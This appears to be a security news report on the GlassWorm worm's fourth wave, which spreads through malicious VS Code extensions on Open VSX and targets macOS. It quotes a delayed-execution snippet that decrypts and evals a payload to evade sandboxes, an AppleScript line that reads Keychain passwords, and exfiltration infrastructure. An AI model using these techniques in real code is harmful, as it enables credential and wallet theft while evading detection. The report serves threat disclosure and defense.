Attacks macOS via Malicious VS Code Self-Propagating

Okay, so there’s a new wave of GlassWorm malware out there, and here’s the big news: it’s making a pretty significant shift. Instead of just hitting Windows systems, it’s now targeting macOS. This thing is a self-propagating worm, meaning it spreads itself, and it’s doing so through malicious VS Code extensions found on the Open VSX marketplace. Seriously, it’s already racked up over 50,000 downloads.

The fourth wave introduces several concerning changes including encrypted payloads, hardware wallet trojanization capabilities, and sophisticated sandbox evasion techniques that allow it to bypass traditional security scanning tools.

The threat actor behind GlassWorm has proven remarkably adaptive, evolving through four distinct waves since October. Previous campaigns relied on invisible Unicode characters and compiled Rust binaries to conceal malicious code.

The latest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads specifically engineered for macOS environments.

Three suspicious extensions were flagged on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all connected through shared infrastructure and encryption keys.

The malware employs a Solana blockchain-based command and control infrastructure that makes takedown efforts nearly impossible.

By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized control that cannot be disrupted through traditional domain blocking.

Researchers traced the infrastructure to IP address 45.32.151.157, which was also used in the third wave, confirming continuity of the threat actor.

Koi analysts identified the malware through behavioral analysis after their risk engine detected unusual patterns in extension behavior and network communications.

Encrypted Payload and Sandbox Evasion Tactics

The fourth wave introduces a clever timing mechanism designed to evade automated security analysis. Once installed, the malicious extension waits exactly 15 minutes before executing its payload.

This delay is critical because most sandbox environments timeout after 5 minutes, meaning the malware appears completely benign during automated scanning.

The code contains a hardcoded value of 9e5 milliseconds (900,000 milliseconds equals 15 minutes), which triggers the decryption and execution of the AES-256-CBC encrypted payload.

setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);

The payload itself is embedded at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remains consistent across all three malicious extensions.

This shared cryptographic infrastructure confirms a single threat actor is responsible for the campaign.

After the delay period expires, the malware retrieves the current command-and-control endpoint from the Solana blockchain and executes any instructions it receives.

The macOS-specific payload includes AppleScript for stealth execution, LaunchAgents for persistence rather than Windows Registry keys, and direct access to the macOS Keychain database to retrieve stored passwords and credentials.

set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"

The malware also includes the capability to replace hardware wallet applications with trojanized versions, targeting both Ledger Live and Trezor Suite.

While the wallet replacement functionality was not fully active during testing on December 29, 2025, the code infrastructure is complete and awaiting payload uploads.

The malware validates that downloaded files exceed 1000 bytes before installation, preventing broken installations that might alert victims.

All stolen data gets staged in the temporary directory /tmp/ijewf/, compressed, and sent to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.